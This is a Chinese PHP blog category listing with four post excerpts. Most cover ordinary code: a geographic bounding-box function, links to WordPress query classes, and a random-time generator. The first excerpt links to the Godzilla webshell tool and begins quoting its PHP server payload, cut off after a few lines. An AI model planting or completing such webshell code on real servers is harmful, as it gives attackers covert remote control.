文章分类 -  php

摘要:Github : https://github.com/BeichenDream/Godzilla <?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i 阅读全文
posted @ 2022-06-06 15:35 我就丶是逗比 阅读(542) 评论(0) 推荐(0)
摘要:1 /** 2 * [returnSquarePoint description] 3 * @param [type] $lng 精度 4 * @param [type] $lat 纬度 5 * @param float $distance 距离 以KM为单位 6 * @param integer 阅读全文
posted @ 2021-12-14 12:13 我就丶是逗比 阅读(215) 评论(0) 推荐(0)
摘要:WP_Tax_Query: https://github.com/WordPress/WordPress/blob/master/wp-includes/class-wp-tax-query.php WP_Meta_Query: https://github.com/WordPress/WordPr 阅读全文
posted @ 2021-11-11 21:23 我就丶是逗比 阅读(44) 评论(0) 推荐(0)
摘要:/** * 生成某个范围内的随机时间 * @param <type> $begintime 起始时间 格式为 Y-m-d H:i:s * @param <type> $endtime 结束时间 格式为 Y-m-d H:i:s * @param <type> $now 是否是时间戳 格式为 Boole 阅读全文
posted @ 2021-10-27 11:03 我就丶是逗比 阅读(45) 评论(0) 推荐(0)